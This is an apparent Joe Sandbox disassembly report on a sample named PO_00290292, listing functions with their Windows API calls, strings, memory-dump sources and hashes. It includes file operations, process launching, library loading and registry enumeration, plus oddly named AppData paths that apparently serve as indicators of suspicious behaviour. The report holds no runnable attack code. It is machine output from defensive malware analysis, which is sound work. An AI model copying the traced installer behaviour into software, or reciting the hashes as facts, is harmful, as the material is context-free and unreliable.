                                                                  • Opcode Fuzzy Hash: f084a8137c272c7609008576fb265960e9ac12256820a4da339362f4de570230
                                                                  • Instruction Fuzzy Hash: 78E086B14407149AC124AF7CAD495853A185F453357248726F178F20F0C778996B5E9D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403093,000000FF,00000000,00000000,0040A230,?), ref: 0040310C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID: x~
                                                                  • API String ID: 973152223-1841499174
                                                                  • Opcode ID: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                                  • Instruction ID: 040f2acbe5348ef8c996952313d322865bd2faa87b76d8d9ba7109e69b0e4b3d
                                                                  • Opcode Fuzzy Hash: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
                                                                  • Instruction Fuzzy Hash: 22316B30200219EBDB108F55ED84ADA3F68EB08359F20813AF905EA1D0DB79DF50DBA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00405BDD: CharNextW.USER32(?,?,00425F30,?,00405C51,00425F30,00425F30, 4Wu.Wu,?,75572EE0,0040598F,?,75573420,75572EE0,00000000), ref: 00405BEB
                                                                    • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405BF0
                                                                    • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405C08
                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                    • Part of subcall function 004057AC: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004057EF
                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement,?,00000000,000000F0), ref: 00401645
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement, xrefs: 00401638
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                  • String ID: C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement
                                                                  • API String ID: 1892508949-4198271790
                                                                  • Opcode ID: 2305ffb504cd1727ef0d2f6d990949bd10217623809cec2c7a11ebe9bcb6ddd7
                                                                  • Instruction ID: 18abe7de9e9977a76830232601504265d2e6edcedfe07fce7f69d5744a4425eb
                                                                  • Opcode Fuzzy Hash: 2305ffb504cd1727ef0d2f6d990949bd10217623809cec2c7a11ebe9bcb6ddd7
                                                                  • Instruction Fuzzy Hash: F911E631500504EBCF207FA0CD0199E3AB2EF44364B25453BF906B61F2DA3D4A819E5E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 00405887
                                                                  • CloseHandle.KERNEL32(?), ref: 00405894
                                                                  Strings
                                                                  • Error launching installer, xrefs: 00405871
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleProcess
                                                                  • String ID: Error launching installer
                                                                  • API String ID: 3712363035-66219284
                                                                  • Opcode ID: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                                  • Instruction ID: 0fb7bd0647ee639374dbc29985885c8cd5f4694ddcbbc5ba66c50ad851a9a680
                                                                  • Opcode Fuzzy Hash: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                                  • Instruction Fuzzy Hash: 22E04FB0A002097FEB009B64ED45F7B77ACEB04208F408431BD00F2150D77498248A78
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6748365695d0b60958ae2de605dce3010a9a46cb287cd8314348fa6e45a6e7ef
                                                                  • Instruction ID: 95c87b37ce546c92696c349aad8761a6baa0f42cb897a758cf539d426e2a5a70
                                                                  • Opcode Fuzzy Hash: 6748365695d0b60958ae2de605dce3010a9a46cb287cd8314348fa6e45a6e7ef
                                                                  • Instruction Fuzzy Hash: 65A13471D00229CBDF28CFA8C844AADBBB1FF44305F15816AD956BB281D7785A86DF44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e6b96a49f958b7a8d2aa4cc917083ea926a28b83a61870a924df7985f049b653
                                                                  • Instruction ID: dd225a6952a4a1885b566de7f95e3528e0c965b1b64db9b9769652e5c735704b
                                                                  • Opcode Fuzzy Hash: e6b96a49f958b7a8d2aa4cc917083ea926a28b83a61870a924df7985f049b653
                                                                  • Instruction Fuzzy Hash: 3D913370D04229CBDF28CFA8C844BADBBB1FF44305F15816AD856BB291C7789A86DF45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 683f34e5330f3119535e65c3fcc014917b66dea9351a733ad05ad489270f429c
                                                                  • Instruction ID: c728d5504c89e28601c55753f21d2f559f3974f1a6ce44cf054f885a45476dee
                                                                  • Opcode Fuzzy Hash: 683f34e5330f3119535e65c3fcc014917b66dea9351a733ad05ad489270f429c
                                                                  • Instruction Fuzzy Hash: 06813471D04228CFDF24CFA8C844BADBBB1FB44305F25816AD856BB291C7789A86DF45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a646d1c18714c06b63ca95da94aa03745834858b299022791e2b3ebf89425e7d
                                                                  • Instruction ID: 5389f57cfb4a3ea8b0a271fe5c21418892ef356aef38e154ca47b5156c43700c
                                                                  • Opcode Fuzzy Hash: a646d1c18714c06b63ca95da94aa03745834858b299022791e2b3ebf89425e7d
                                                                  • Instruction Fuzzy Hash: 37816831D04229CBDF24CFA8C844BADBBB0FF44305F11816AD956BB281D7785986DF45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 96da27bd456154c1aedaa85bcfc68d0a261e277abb4cee4e4020ac7d50c7f0c5
                                                                  • Instruction ID: 7cecadd07089ef5f508d2048bcf4206a214b5fe31ba49bd0cdf53ec9cfb3ce0b
                                                                  • Opcode Fuzzy Hash: 96da27bd456154c1aedaa85bcfc68d0a261e277abb4cee4e4020ac7d50c7f0c5
                                                                  • Instruction Fuzzy Hash: 35712175D04228CBDF28CFA8C844BADBBB1FB44305F15816AD806BB281D7789A96DF44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 29e3b149f88ae6fd458fdcc74d478f48b2ed7dfe8c3e809ea2d72e9fd2fa3729
                                                                  • Instruction ID: f96eec566abe8136b7696836c8602221009d3abbc3cba5cf828ad5cd02611e0d
                                                                  • Opcode Fuzzy Hash: 29e3b149f88ae6fd458fdcc74d478f48b2ed7dfe8c3e809ea2d72e9fd2fa3729
                                                                  • Instruction Fuzzy Hash: 56713371D04228CBEF28CFA8C844BADBBB1FF44305F15816AD856BB281C7789996DF45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b9c673c2534040230f9089defbd7d825788091a80835a4c341425c1e948b069d
                                                                  • Instruction ID: 17f295adf0ba2181094cfffbed918b39bb4908eb68d6975640ddb9889f0749db
                                                                  • Opcode Fuzzy Hash: b9c673c2534040230f9089defbd7d825788091a80835a4c341425c1e948b069d
                                                                  • Instruction Fuzzy Hash: F2714531D04229CBEF28CF98C844BADBBB1FF44305F11816AD816BB291C7785A96DF44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                    • Part of subcall function 004052DD: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                                    • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                                    • Part of subcall function 004052DD: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00402E19), ref: 00405338
                                                                    • Part of subcall function 004052DD: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\), ref: 0040534A
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                                  • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 334405425-0
                                                                  • Opcode ID: 68a78ee8fa017585f8b54af057a81de7910946204d32f94ef4e16293bebe516e
                                                                  • Instruction ID: 135227bab5bbd0cb957ad13063370cb04025123e1843093ab7a3381522db9c00
                                                                  • Opcode Fuzzy Hash: 68a78ee8fa017585f8b54af057a81de7910946204d32f94ef4e16293bebe516e
                                                                  • Instruction Fuzzy Hash: 7D21A731900219EBCF20AFA5CE48A9E7E71BF00354F20427BF511B51E1DBBD8A81DA5D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                  • RegEnumValueW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Enum$CloseOpenValue
                                                                  • String ID:
                                                                  • API String ID: 167947723-0
                                                                  • Opcode ID: 8f0220e1db65b98a9a97dda6677fe8e3d64efce9e8ca8f1893c3e0ec0e4c3eff
                                                                  • Instruction ID: c7ec42ec2a5b8cbcf97019b844e04a4f9c539befeef3331d530b96059407f5ff
                                                                  • Opcode Fuzzy Hash: 8f0220e1db65b98a9a97dda6677fe8e3d64efce9e8ca8f1893c3e0ec0e4c3eff
